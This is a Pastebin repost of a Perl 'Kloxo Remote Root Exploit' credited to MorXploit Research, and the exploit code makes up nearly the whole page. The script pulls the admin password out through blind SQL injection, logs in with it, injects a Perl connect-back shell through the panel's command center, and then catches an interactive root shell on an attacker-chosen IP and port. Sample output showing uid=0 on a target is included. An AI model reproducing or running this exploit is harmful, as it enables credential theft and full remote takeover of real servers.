API tools faq
paste
Advertisement
Mayk0

#; Kloxo Remote Root Exploit

Mayk0
Mar 2nd, 2014
361
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 7.40 KB | None | 0 0
raw download clone embed print report
  1. Full title   Kloxo Remote Root Exploit
  2. Date add    2014-03-02
  3. Category    web applications
  4. Platform    linux
  5. Risk    <font color="#FFBF00">Security Risk High</font>
  6. Description  Kloxo remote root exploit that leverages a blind SQL injection and injects a perl connect back shell (/bin/sh) with root privilege.
  7.  
  8. =====================================
  9.  
  10. #!/usr/bin/perl
  11. #
  12. # Title: Kloxo remote root exploit              
  13. # Author: Simo Ben youssef
  14. # Contact: Simo_at_Morxploit_com
  15. # Coded: 28 January 2014
  16. # Published: 26 February 2014
  17. # MorXploit Research
  18. # http://www.MorXploit.com
  19. #
  20. # Download:
  21. # http://www.morxploit.com/morxploits/morxkloxo.pl
  22. #
  23. # Requires LWP::UserAgent
  24. # apt-get install libwww-perl
  25. # yum install libwww-perl
  26. # perl -MCPAN -e 'install Bundle::LWP'
  27. # For SSL support:
  28. # apt-get install liblwp-protocol-https-perl
  29. # yum install perl-Crypt-SSLeay
  30. #
  31. # Tested on CentOS 5.8 and 5.9
  32. # Should work on CentOS/RHEL 5.x
  33. #
  34. # Author disclaimer:
  35. # The information contained in this entire document is for educational, demonstration and testing purposes only.
  36. # Author cannot be held responsible for any malicious use. Use at your own risk.
  37. #
  38. # perl morxkloxo.pl http://******.com:7778 **.**.**.** 31337
  39. #
  40. # ===================================================
  41. # --- Kloxo remote root exploit
  42. # --- By: Simo Ben youssef <simo_at_morxploit_com>
  43. # --- MorXploit Research www.MorXploit.com
  44. # ===================================================
  45. # [*] MorXploiting http://******.com:7778
  46. # [*] It might take a little while, so sit your ass down and relax
  47. # [+] Base64 pwd: bW9yeHBsb2l0
  48. # [+] Got admin password: morxploit
  49. # [*] Logging in ...
  50. # [+] Successfully logged in!
  51. # [*] Trying to get server info
  52. # [+] Done!
  53. # [*] Trying to inject connect back shell
  54. # [+] Looks good, now waiting for root shell
  55. # [+] Et voila you are in!
  56. #
  57. # Linux ******.com 2.6.18-308.8.2.el5.028stab101.1PAE #1 SMP Sun Jun 24 21:40:20 MSD 2012 i686 i686 i386 GNU/Linux
  58. # uid=0(root) gid=0(root)
  59.  
  60. use LWP::UserAgent;
  61. use IO::Socket;
  62. use strict;
  63. use MIME::Base64;
  64.  
  65. sub banner {
  66. system('clear');
  67. print "===================================================\n";
  68. print "--- Kloxo remote root exploit\n";
  69. print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
  70. print "--- MorXploit Research www.MorXploit.com\n";
  71. print "===================================================\n";
  72. }
  73.  
  74. if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
  75. banner();
  76. print "perl $0 <target> <connectbackIP> <connectbackport> <verbose>\n";
  77. print "perl $0 http://localhost:7778 127.0.0.1 31337\n";
  78. exit;
  79. }
  80.  
  81. my $host = $ARGV[0];
  82. my $cbhost = $ARGV[1];
  83. my $cbport = $ARGV[2];
  84. my $v = $ARGV[3];
  85. my $pos = "8";
  86. my $start = "48";
  87. my $ends = "122";
  88. my $password;
  89. my $char;
  90. my $cookie;
  91. my $decoded;
  92. my $class;
  93. my $lhost;
  94. $| = 1;
  95. $SIG{CHLD} = 'IGNORE';
  96.  
  97. my $l_sock = IO::Socket::INET->new(
  98. Proto => "tcp",
  99. LocalPort => "$cbport",
  100. Listen => 1,
  101. LocalAddr => "0.0.0.0",
  102. Reuse => 1,
  103. ) or die "[-] Could not listen on $cbport: $!\n";
  104.  
  105. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  106. $ua->timeout(10);
  107.  
  108. my $up = $ua->get("$host");
  109. unless ($up->is_success) {
  110. print "[-] Error: " . $up->status_line . "\n";
  111. exit;
  112. }
  113. banner();
  114. print "[*] Verbose mode on!\n" if (defined $v);
  115. print "[*] MorXploiting $host\n";
  116. print "[*] It might take a little while, so sit your ass down and relax\n";
  117. my $check = "lbin/webcommand.php";
  118. my $kloxo = $ua->get("$host/$check");
  119.  
  120. unless ($kloxo->decoded_content =~ /__error_only_clients_and_auxiliary_allowed_to_login/) {
  121. print "[-] Doesn't seem like $host is running kloxo\n";
  122. exit;
  123. }
  124.  
  125. while ($pos) {
  126. for(my $count=$start;$count<=$ends;$count++) {
  127.  
  128. if (($count > 57) && ($count < 61) || ($count > 90) && ($count < 97)) {
  129. next;
  130. }
  131. my $query = "lbin/webcommand.php?login-class=client&login-name=a%27%20union%20select%20%27%241%24Tw5.g72.%24/0X4oceEHjGOgJB/fqRww/%27%20from%20client%20where%20ascii%28substring%28%28%20select%20realpass%20from%20client%20limit%201%29%2c$pos%2c1%29%29%3d$count%23&login-password=123456";
  132. my $page = $ua->get("$host/$query");
  133. print "\r[*] Trying char/position: $count/$pos" if (defined $v);
  134. if (($page->is_success) && ($page->decoded_content =~ /^\s*$/)) {
  135. $char = chr($count);
  136. $password .= $char;
  137. print "\n" if (defined $v);
  138. print "\r[+] Base64 pwd: $password";
  139. sleep (2) if (defined $v);
  140. last;
  141. }
  142. }
  143. my $passlength = length($password);
  144. my $charlength = ($pos - 7);
  145. if (($passlength < $charlength) && ($passlength != 0)) {
  146. $decoded = decode_base64($password);
  147. print "\n[+] Got admin password: $decoded\n";
  148. last;
  149. }
  150. elsif ($passlength == 0) {
  151. print "\n[-] Failed, probably not vulnerable\n";
  152. exit;
  153. }
  154. $pos++
  155. }
  156.  
  157. print "[*] Logging in ...\n";
  158. my $kloxo = $ua->post("$host/htmllib/phplib/",[ "frm_clientname"=> "admin", "frm_password"=> "$decoded", "login" => "Login" ] );
  159.  
  160. if ($kloxo->as_string =~ /Set-Cookie: kloxo-session-id=(.*?);/) {
  161. print "[+] Successfully logged in!\n";
  162. $cookie = $1;
  163. }
  164. else {
  165. print "[-] Couldn't log in\n";
  166. exit;
  167. }
  168.  
  169. print "[*] Trying to get server info\n";
  170. my $getinfo = $ua->get("$host/display.php?frm_action=show", 'Cookie' => "kloxo-clientname=admin; kloxo-classname=client; kloxo-session-id=$cookie");
  171. if ($getinfo->decoded_content =~ /commandcenter">(.*?)">/s) {
  172. my $pserver = $1;
  173. $pserver =~ /value =\"(.*)/;
  174. $class = $1;
  175. }
  176. else {
  177. print "[-] Couldn't get info, trying default settings\n";
  178. $class = "pserver";
  179. }
  180. if ($getinfo->decoded_content =~ /name="frm_o_o\[0\]\[class\]" value ="$class">(.*?)">/s) {
  181. my $nname = $1;
  182. $nname =~ /value =\"(.*)/;
  183. $lhost = $1;
  184. }
  185. else {
  186. print "[-] Couldn't get info, trying default settings\n";
  187. $lhost = "localhost";
  188. }
  189. print "[+] Done!\n";
  190.  
  191. my $ua2 = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  192. $ua2->timeout(10);
  193. print "[*] Trying to inject connect back shell\n";
  194. my $inject = $ua2->post("$host/display.php",
  195. Content_Type => 'form-data',
  196. Cookie => "kloxo-clientname=admin; kloxo-classname=client; kloxo-session-id=$cookie",
  197. Content => [
  198. 'frm_o_o[0][class]' => "$class",
  199. 'frm_o_o[0][nname]' => "$lhost",
  200. 'frm_pserver_c_ccenter_command' => "perl -MIO -e '\$p=fork;exit,if(\$p); use Socket; use FileHandle; my \$system = \"/bin/sh\"; my \$host = \"$cbhost\"; my \$port = \"$cbport\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\"tcp\")); connect(SOCKET, sockaddr_in(\$port, inet_aton(\$host))); SOCKET->autoflush(); open(STDIN, \">&SOCKET\"); open(STDOUT,\">&SOCKET\"); open(STDERR,\">&SOCKET\"); print \"[+] Et voila you are in!\\n\\n\"; system(\"uname -a;id\"); system(\$system);'",
  201. 'frm_action' => 'updateform',
  202. 'frm_subaction' => 'commandcenter',
  203. 'frm_change' => 'Execute',
  204. ],
  205. );
  206. unless ($inject->as_string =~ /200 OK/) {
  207. print "[-] Something went wrong\n";
  208. exit;
  209. }
  210.  
  211. print "[+] Looks good, now waiting for root shell\n";
  212.  
  213. my $a_sock = $l_sock->accept();
  214. $l_sock->shutdown(SHUT_RDWR);
  215. copy_data_bidi($a_sock);
  216.  
  217. sub copy_data_bidi {
  218. my ($socket) = @_;
  219. my $child_pid = fork();
  220. if (! $child_pid) {
  221. close(STDIN);
  222. copy_data_mono($socket, *STDOUT);
  223. $socket->shutdown(SHUT_RD);
  224. exit();
  225. } else {
  226. close(STDOUT);
  227. copy_data_mono(*STDIN, $socket);
  228. $socket->shutdown(SHUT_WR);
  229. kill("TERM", $child_pid);
  230. }
  231. }
  232. sub copy_data_mono {
  233. my ($src, $dst) = @_;
  234. my $buf;
  235. while (my $read_len = sysread($src, $buf, 4096)) {
  236. my $write_len = $read_len;
  237. while ($write_len) {
  238. my $written_len = syswrite($dst, $buf);
  239. return unless $written_len;
  240. $write_len -= $written_len;
  241. }
  242. }
  243. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!